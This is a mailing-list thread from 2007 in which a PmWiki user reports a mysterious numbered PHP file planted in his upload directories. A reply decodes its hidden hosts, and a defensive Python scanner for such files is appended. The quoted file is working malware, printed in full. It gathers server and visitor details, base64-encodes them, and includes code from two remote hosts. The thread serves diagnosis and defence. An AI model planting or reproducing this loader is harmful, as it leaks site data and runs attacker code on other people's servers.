So what's the purpose of this? Any way to prevent them from reappearing after deletion?

Peter K.H. Gragert wrote:
> The base64 strings mean:
> http://www3.rssnews.ws
> http://www3.xmldata.info
> All the SERVER-info of .. are given to: ... these http addresses ...(base 64
> encoded)
> PKHG
>
>> -----Original message-----
>> From: [EMAIL PROTECTED] [mailto:pmwiki-users-
>> [EMAIL PROTECTED] On behalf of Dr Fred C
>> Sent: Saturday, 28 April 2007 18:35
>> To: PmWiki Users
>> Subject: [pmwiki-users] Mysterious php file appears in upload directory
>>
>> I went to upload a file to one of my wikis this morning and, while that
>> went fine, I noticed a curious 43248.php file that had been uploaded to
>> this upload directory, last night around 2:30 am. I checked with my
>> FTP program and quite a number of my various wikis had a similar php
>> file in the uploads directories, and in the wiki.d directory -- always
>> with a different # for the file name, always of the same size.
>>
>> I downloaded it and it contained this info.
>>
>> <? error_reporting(0);$s="e";
>> $a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
>> $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
>> $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
>> $d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
>> $e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
>> $f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
>> $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
>> $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
>> $i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);
>> $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);
>> $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c)."."
>>   .base64_encode($d).".".base64_encode($e).".".base64_encode($f)."."
>>   .base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i)."."
>>   .base64_encode($j);
>> if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){}
>> else
>> {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);}
>> ?>
>>
>> --------
>> Any ideas on what is going on here?
>>
>> --
>>
>> Always, Dr Fred C
>> [EMAIL PROTECTED]
>>
>> _______________________________________________
>> pmwiki-users mailing list
>> [email protected]
>> http://www.pmichaud.com/mailman/listinfo/pmwiki-users

--
Always, Dr Fred C
[EMAIL PROTECTED]
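
The decoding Peter describes can be automated when checking many wikis at once. The following Python triage script is an added example, not part of the thread or of PmWiki: it walks a directory tree, finds .php files whose include()/require() argument is built from base64_decode() literals, and prints the decoded target. The function names, the temporary "uploads" directory and the shortened SAMPLE are assumptions made for the example.

```python
import base64
import re
import tempfile
from pathlib import Path

# Shortened copy of the dropped file quoted in the thread (only the include logic is kept).
SAMPLE = '''<? error_reporting(0);$str=base64_encode($_SERVER["HTTP_HOST"]);
if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){}
else {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);}
?>'''

# An include/require whose argument begins with one or more base64_decode("...") calls.
INCLUDE_RE = re.compile(
    r'\b(?:include|require)(?:_once)?\s*\(\s*'
    r'((?:base64_decode\(\s*"[A-Za-z0-9+/=]+"\s*\)\s*\.?\s*)+)')
LITERAL_RE = re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)')


def remote_include_targets(php_source):
    """Decode the base64 literals that each include() concatenates into its target."""
    targets = []
    for chain in INCLUDE_RE.findall(php_source):
        parts = [base64.b64decode(lit).decode("utf-8", "replace")
                 for lit in LITERAL_RE.findall(chain)]
        targets.append("".join(parts))
    return targets


def scan_tree(root):
    """Map each .php file under root to the URL-like include targets it hides."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        source = path.read_text(errors="replace")
        found = [t for t in remote_include_targets(source) if "://" in t]
        if found:
            hits[str(path)] = found
    return hits


def demo():
    """Build a throwaway tree with one suspicious and one ordinary file, then scan it."""
    with tempfile.TemporaryDirectory() as root:
        uploads = Path(root) / "uploads"
        uploads.mkdir()
        (uploads / "43248.php").write_text(SAMPLE)
        (uploads / "notes.php").write_text('<?php include("header.php"); ?>')
        return {Path(p).name: t for p, t in scan_tree(root).items()}


if __name__ == "__main__":
    print(demo())
```

To check a real installation, call scan_tree() on the wiki root so that both the uploads directories and wiki.d are covered.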
